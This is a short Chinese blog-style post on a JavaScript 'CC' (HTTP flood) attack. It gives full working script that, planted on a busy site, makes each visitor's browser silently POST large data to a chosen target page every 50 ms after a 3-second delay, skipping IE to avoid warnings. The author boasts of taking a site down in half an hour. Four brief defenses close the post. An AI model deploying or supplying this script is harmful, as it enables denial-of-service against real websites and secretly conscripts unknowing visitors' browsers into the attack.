基于js的CC攻击实现与防御

只要用户访问网站就会自动不断的通过ajax向指定页面发送post数据包，半个小时后对方网站基本over了。

当然，攻击的页面是我先选好了的需要获取数据量比较大的页面，这个很重要。

而且由于ajax跨域安全限制，发送数据包后浏览器是不会获取返回数据的，这样对当前访问的用户基本没有影响，跟正常访问没区别。

但缺点也是因为跨域限制，在IE下会弹出警告没有权限或需要授权，所以我在代码中if了ie浏览器下不执行函数。

如果你有pv大的shell的话这个不是问题，现在用非IE人已经很多了，我在忽略IE用户的情况下也只用了半个小时就o了。

下面是ajax攻击代码，间隔时间可以根据需要自己调整，我设置的是50毫秒一次。

<pre lang=”javascript”>

<script type="text/javascript">

var t_postdata='id=datadatadatadatadata';//数据越大效果越好。

var t_url='http://www.xxx.com/test.php';

function c_xmlHttp()

{

if(window.ActiveXObject)

{

xmlHttp=new ActiveXObject('Microsoft.XMLHTTP');

}

else if(window.XMLHttpRequest)

{

xmlHttp=new XMLHttpRequest();

}

return xmlHttp;

}

function post_send()

{

var xmlHttp=c_xmlHttp();

xmlHttp.open("POST",t_url,true);

xmlHttp.setRequestHeader("Content-Type","application/x-www-form-urlencoded");

xmlHttp.send(t_postdata);

r_send();

}

function r_send()

{

setTimeout("post_send()", 50);//50毫秒一次

}

if(!+[1,])//IE下不执行。

{var fghj=1;}

else

{setTimeout("post_send()", 3000);}//访问网站3秒后再执行，这样用户就毫无感觉。

</script>

</pre>

防御办法：

1，对数据量比较大的页面使用缓存，尽量减少数据库连接。

2，对每个访问者设置ip cookie，限制时段内访问次数。

3，对每个用户设置session，限制时段内访问次数。

4，缩短Timeout时间，这样当连接过多就会自动丢弃一部分。